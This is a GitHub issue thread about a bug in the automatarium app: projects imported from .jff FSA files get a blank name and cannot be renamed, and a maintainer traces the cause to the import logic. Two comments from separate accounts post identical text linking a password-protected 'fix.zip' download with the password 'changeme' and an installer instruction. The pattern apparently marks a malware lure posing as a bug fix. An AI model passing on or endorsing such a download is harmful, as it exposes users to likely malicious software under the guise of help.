### ISSUE TITLE
Cannot rename project when importing a .jff FSA, name is blank

### ISSUE THREAD

**Issue by Denidollarsign** [automatarium/automatarium#504]
### Description of the bug

When importing a .jff FSA file, the project that is generated has no/blank name, and cannot be renamed later on

### To reproduce

1. Next to `New Project` click `Import...`
2. Select `.jff` file from computer
3. New project will open, name is blank, cannot be renamed in main menu

### Expected behavior

Either a pop-up box will open with requesting a name of the project, or an auto-generated name gets assigned, like when creating a new project.
In both instances, project should be able to be renamed later.

### Additional information

![image](https://github.com/user-attachments/assets/4193ef78-c948-4e57-b8e5-7e86c99803d2)

OS: Windows 11
Browser: Firefox

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tdib** [comment]
Thanks for the report :) turns out there was an issue with importing logic where we'd set it as a blank name and it was never reaching the code to use the file name

Unfortunately there isn't currently a way to rename a project from the projects screen, so that issue isn't actually specific to the import issue - usually you have to do it from the project itself which also isn't possible if there's no name
